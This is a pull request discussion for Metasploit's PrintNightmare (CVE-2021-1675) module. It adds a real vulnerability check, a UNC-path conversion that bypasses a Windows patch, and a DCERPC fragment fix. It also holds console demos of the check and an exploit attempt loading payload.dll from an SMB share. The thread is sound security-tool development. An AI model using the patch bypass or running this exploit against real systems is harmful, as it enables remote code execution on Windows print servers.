### PR TITLE
Improved PrintNightmare Check and DCERPC Library Bug Fixes

### PR DESCRIPTION
**Pull request by zeroSteiner**
This PR makes a couple of improvements to the PrintNightmare module, most notably an enhanced check method that will actually determine vulnerability instead of just detecting the service. The updates will also automatically convert UNC paths into the `\??\UNC\host\path\to\dll` format that's necessary to bypass the second (most recent as of the time of this writing) patch. I tested this on a Server 2016 and Server 2019 instances, and in both cases the bypass path format works regardless of the patch level making it the most reliable way to exploit the vulnerability.

This also fixes a bug in the DCERPC library where data that was read would be incomplete when the response would not fit into a single fragment. Basically the DCERPC read method would only read one fragment, so I updated it to read until the last fragment flag is specified. This fixed a stack trace that would occur when running the PrintNightmare module as it was enumerating the installed print drivers because the response from the server can be quite large. I had to update the logic that's used to determine the boundaries of the stub data because it was broken when the data was fragmented. I copied the logic from [RubySMB's](https://github.com/rapid7/ruby_smb/blob/53e4855b76a63f9ded497182b07a9181b820a925/lib/ruby_smb/dcerpc/response.rb#L15) implementation. I briefly looked at converting the DCERPC to just use RubySMB's DCERPC response definition but because the `#last_response` is used in a few places I decided not to.

<details>
<summary>Stack Trace</summary>

```
msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > check

[*] 192.168.159.40:445 - Binding to 12345678-1234-abcd-ef00-0123456789ab:1.0@ncacn_np:192.168.159.40[\spoolss] ...
[*] 192.168.159.40:445 - Bound to 12345678-1234-abcd-ef00-0123456789ab:1.0@ncacn_np:192.168.159.40[\spoolss] ...
[*] 192.168.159.40:445 - Bound to 12345678-1234-abcd-ef00-0123456789ab:1.0@ncacn_np:192.168.159.40[\spoolss] ...
[*] 192.168.159.40:445 - Target environment: Windows v10.0.14393 (x64)
[*] 192.168.159.40:445 - Enumerating the installed printer drivers...
[-] 192.168.159.40:445 - Auxiliary failed: EOFError End of file reached
[-] 192.168.159.40:445 - Call stack:
[-] 192.168.159.40:445 -   /home/smcintyre/.rvm/gems/ruby-2.7.2/gems/bindata-2.4.10/lib/bindata/io.rb:316:in `read'
[-] 192.168.159.40:445 -   /home/smcintyre/.rvm/gems/ruby-2.7.2/gems/bindata-2.4.10/lib/bindata/io.rb:278:in `readbytes'
[-] 192.168.159.40:445 -   (eval):23:in `read_and_return_value'
[-] 192.168.159.40:445 -   /home/smcintyre/.rvm/gems/ruby-2.7.2/gems/bindata-2.4.10/lib/bindata/base_primitive.rb:129:in `do_read'
[-] 192.168.159.40:445 -   /home/smcintyre/.rvm/gems/ruby-2.7.2/gems/bindata-2.4.10/lib/bindata/array.rb:305:in `block in do_read'
[-] 192.168.159.40:445 -   /home/smcintyre/.rvm/gems/ruby-2.7.2/gems/bindata-2.4.10/lib/bindata/array.rb:303:in `loop'
[-] 192.168.159.40:445 -   /home/smcintyre/.rvm/gems/ruby-2.7.2/gems/bindata-2.4.10/lib/bindata/array.rb:303:in `do_read'
[-] 192.168.159.40:445 -   /home/smcintyre/.rvm/gems/ruby-2.7.2/gems/bindata-2.4.10/lib/bindata/struct.rb:139:in `block in do_read'
[-] 192.168.159.40:445 -   /home/smcintyre/.rvm/gems/ruby-2.7.2/gems/bindata-2.4.10/lib/bindata/struct.rb:139:in `each'
[-] 192.168.159.40:445 -   /home/smcintyre/.rvm/gems/ruby-2.7.2/gems/bindata-2.4.10/lib/bindata/struct.rb:139:in `do_read'
[-] 192.168.159.40:445 -   /home/smcintyre/.rvm/gems/ruby-2.7.2/gems/bindata-2.4.10/lib/bindata/primitive.rb:116:in `read_and_return_value'
[-] 192.168.159.40:445 -   /home/smcintyre/.rvm/gems/ruby-2.7.2/gems/bindata-2.4.10/lib/bindata/base_primitive.rb:129:in `do_read'
[-] 192.168.159.40:445 -   /home/smcintyre/.rvm/gems/ruby-2.7.2/gems/ruby_smb-2.0.10/lib/ruby_smb/dcerpc/ndr.rb:227:in `do_read'
[-] 192.168.159.40:445 -   /home/smcintyre/.rvm/gems/ruby-2.7.2/gems/bindata-2.4.10/lib/bindata/struct.rb:139:in `block in do_read'
[-] 192.168.159.40:445 -   /home/smcintyre/.rvm/gems/ruby-2.7.2/gems/bindata-2.4.10/lib/bindata/struct.rb:139:in `each'
[-] 192.168.159.40:445 -   /home/smcintyre/.rvm/gems/ruby-2.7.2/gems/bindata-2.4.10/lib/bindata/struct.rb:139:in `do_read'
[-] 192.168.159.40:445 -   /home/smcintyre/.rvm/gems/ruby-2.7.2/gems/bindata-2.4.10/lib/bindata/base.rb:147:in `block in read'
[-] 192.168.159.40:445 -   /home/smcintyre/.rvm/gems/ruby-2.7.2/gems/bindata-2.4.10/lib/bindata/base.rb:253:in `start_read'
[-] 192.168.159.40:445 -   /home/smcintyre/.rvm/gems/ruby-2.7.2/gems/bindata-2.4.10/lib/bindata/base.rb:145:in `read'
[-] 192.168.159.40:445 -   /home/smcintyre/.rvm/gems/ruby-2.7.2/gems/bindata-2.4.10/lib/bindata/base.rb:21:in `read'
[-] 192.168.159.40:445 -   /home/smcintyre/Repositories/metasploit-framework/modules/auxiliary/admin/dcerpc/cve_2021_1675_printnightmare.rb:464:in `rprn_call'
[-] 192.168.159.40:445 -   /home/smcintyre/Repositories/metasploit-framework/modules/auxiliary/admin/dcerpc/cve_2021_1675_printnightmare.rb:406:in `enum_printer_drivers'
[-] 192.168.159.40:445 -   /home/smcintyre/Repositories/metasploit-framework/modules/auxiliary/admin/dcerpc/cve_2021_1675_printnightmare.rb:327:in `check'
[-] 192.168.159.40:445 - Check failed: The state could not be determined.
msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) >
```
</details>

## Verification

- [x] Start `msfconsole`
- [x] `use auxiliary/admin/dcerpc/cve_2021_1675_printnightmare`
- [x] Run the check method against a vulnerable target
- [x] See that it's reported as vulnerable, not just detected
- [ ] Run the exploit, see that it still works with the new path conversion
- [ ] Update the target version of Windows with all patches, leave Point and Print off (this is the default value)
- [ ] Run the check method again and see that the target is reported as not-vulnerable

## Demo

In this example 192.168.159.96 is a fully patched Server 2019 instance and 192.168.159.40 is an unpatched Server 2016 instance.

```
msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > check 192.168.159.96 192.168.159.40

[*] 192.168.159.96:445 - Binding to 12345678-1234-abcd-ef00-0123456789ab:1.0@ncacn_np:192.168.159.96[\spoolss] ...
[*] 192.168.159.96:445 - Bound to 12345678-1234-abcd-ef00-0123456789ab:1.0@ncacn_np:192.168.159.96[\spoolss] ...
[*] 192.168.159.96:445 - Bound to 12345678-1234-abcd-ef00-0123456789ab:1.0@ncacn_np:192.168.159.96[\spoolss] ...
[*] 192.168.159.96:445 - Target environment: Windows v10.0.17763 (x64)
[*] 192.168.159.96:445 - Enumerating the installed printer drivers...
[*] 192.168.159.96:445 - Using driver path: C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_2097e02ea77b432e\Amd64\UNIDRV.DLL
[*] 192.168.159.96:445 - Retrieving the path of the printer driver directory...
[*] 192.168.159.96:445 - Using driver directory: C:\Windows\system32\spool\DRIVERS\x64
[*] 192.168.159.96:445 - RpcAddPrinterDriverEx response 5 ERROR_ACCESS_DENIED (Access is denied.)
[*] 192.168.159.96:445 - The target is not exploitable. Received ERROR_ACCESS_DENIED implying the target is patched.
[*] 192.168.159.40:445 - Binding to 12345678-1234-abcd-ef00-0123456789ab:1.0@ncacn_np:192.168.159.40[\spoolss] ...
[*] 192.168.159.40:445 - Bound to 12345678-1234-abcd-ef00-0123456789ab:1.0@ncacn_np:192.168.159.40[\spoolss] ...
[*] 192.168.159.40:445 - Bound to 12345678-1234-abcd-ef00-0123456789ab:1.0@ncacn_np:192.168.159.40[\spoolss] ...
[*] 192.168.159.40:445 - Target environment: Windows v10.0.14393 (x64)
[*] 192.168.159.40:445 - Enumerating the installed printer drivers...
[*] 192.168.159.40:445 - Using driver path: C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_dcef07064d319714\Amd64\UNIDRV.DLL
[*] 192.168.159.40:445 - Retrieving the path of the printer driver directory...
[*] 192.168.159.40:445 - Using driver directory: C:\Windows\system32\spool\DRIVERS\x64
[*] 192.168.159.40:445 - RpcAddPrinterDriverEx response 67 ERROR_BAD_NET_NAME (The network name cannot be found.)
[+] 192.168.159.40:445 - The target is vulnerable. Received ERROR_BAD_NET_NAME, implying the target is vulnerable.
msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) >
```

### CODE REVIEW

File: documentation/modules/auxiliary/admin/dcerpc/cve_2021_1675_printnightmare.md [hunk 1]
```diff
@@ -66,6 +66,9 @@ due to how these payloads are synchronized. If the session closes, dies, or the
 DLL can be used again otherwise a new DLL will need to be created for each simultaneously active session. One DLL can
 however be used to establish multiple sessions simultaneously so long as each session is on a different target.
 
+If this value is a UNC path, it will automatically be converted to use the `\??\UNC\` prefix instead of `\\` to bypass
+the path check in certain scenarios.
+
 ### ReconnectDelay
 *This is an advanced option.*
```
Comment (gwillcox-r7) [inline documentation/modules/auxiliary/admin/dcerpc/cve_2021_1675_printnightmare.md:74]: The documentation will need to be updated given the new changes such as deregistering the `AutoCheck` option.

**Review by gwillcox-r7 — CHANGES_REQUESTED** [review]

File: documentation/modules/auxiliary/admin/dcerpc/cve_2021_1675_printnightmare.md (hunk 1 above)
Comment (zeroSteiner) [reply documentation/modules/auxiliary/admin/dcerpc/cve_2021_1675_printnightmare.md:74]: AutoCheck isn't a documented option here so I'm not sure what needs to be updated.

**Comment by gwillcox-r7** [comment]
Unfortunately I'm still getting errors when testing these updates. This is what I get in my results of testing this, showing the `check` method is working but not the actual exploit itself:

```
msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > reload
[*] Reloading module...
msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > show options

Module options (auxiliary/admin/dcerpc/cve_2021_1675_printnightmare):

   Name       Current Setting                       Required  Description
   ----       ---------------                       --------  -----------
   DLL_PATH   \\192.168.224.128\public\payload.dll  yes       The network-based UNC path or local path on the remote target from
                                                               which the server should load the DLL
   RHOSTS     192.168.224.169                       yes       The target host(s), range CIDR identifier, or hosts file with synt
                                                              ax 'file:<path>'
   RPORT      445                                   yes       The SMB service port (TCP)
   SMBDomain  .                                     no        The Windows domain to use for authentication
   SMBPass    test                                  no        The password for the specified username
   SMBUser    test                                  no        The username to authenticate as

msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > exploit
[*] Running module against 192.168.224.169

[*] 192.168.224.169:445 - Running automatic check ("set AutoCheck false" to disable)
[*] 192.168.224.169:445 - Target environment: Windows v10.0.17763 (x64)
[*] 192.168.224.169:445 - Enumerating the installed printer drivers...
[*] 192.168.224.169:445 - Retrieving the path of the printer driver directory...
[+] 192.168.224.169:445 - The target is vulnerable. Received ERROR_BAD_NET_NAME, implying the target is vulnerable.
[*] 192.168.224.169:445 - The named pipe connection was broken, reconnecting after a 10 second delay.
[-] 192.168.224.169:445 - Auxiliary aborted due to failure: unexpected-reply: The RpcAddPrinterDriverEx Print System RPC request failed (DCERPC FAULT => 0xc000000d).
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > 
```

**Review by gwillcox-r7 — APPROVED** [review]

**Comment by gwillcox-r7** [comment]
New changes look good and after further testing on a fresh 2019 VM with VMWare Workstation 15 compatibility things suddenly started to work again (not sure why) but only once per reboot. The new notes that were uploaded should reflect this unreliability a bit more for the worse case scenario. Other Windows versions may have a higher reliability rate.

**Comment by gwillcox-r7** [comment]
# Release Notes
An update has been made to the PrintNightmare module to improve the way that it checks if a target is vulnerable or not and to now automatically converts UNC paths to use the `\??\UNC\host\path\to\dll` format to bypass the second and most recent patch at the time of writing. Additionally a bug was fixed in the DCERPC library where data that was read would be incomplete when the response would not fit into a single fragment to ensure that the PrintNightmare module can now read long responses from the target such as when enumerating the installed printer drivers.

**Comment by zeroSteiner** [comment]
If the error can't be mapped to a Win32 error code, the system probably isn't vulnerable. You should try updating the check method to:

```ruby
case add_printer_driver_ex(container)
when nil
  Exploit::CheckCode::Unknown('Received unknown status code, implying the target is not vulnerable')
```

If that works, would you mind PRing it?

An alternative approach would be to collect all the successful Win32 status codes, return detected for those and then default to `CheckCode::Unknown`. But that would need more testing and we can infer that the vulnerable systems I originally tested the exploit with returned a Win32 error code since this stack trace hadn't occured.

**Comment by ErikWynter** [comment]
@zeroSteiner thanks, I thought that was what was going on. I already added that `when nil` check while testing, so that'll definitely work. I'll try to PR it today or tomorrow.

**Pull request merged**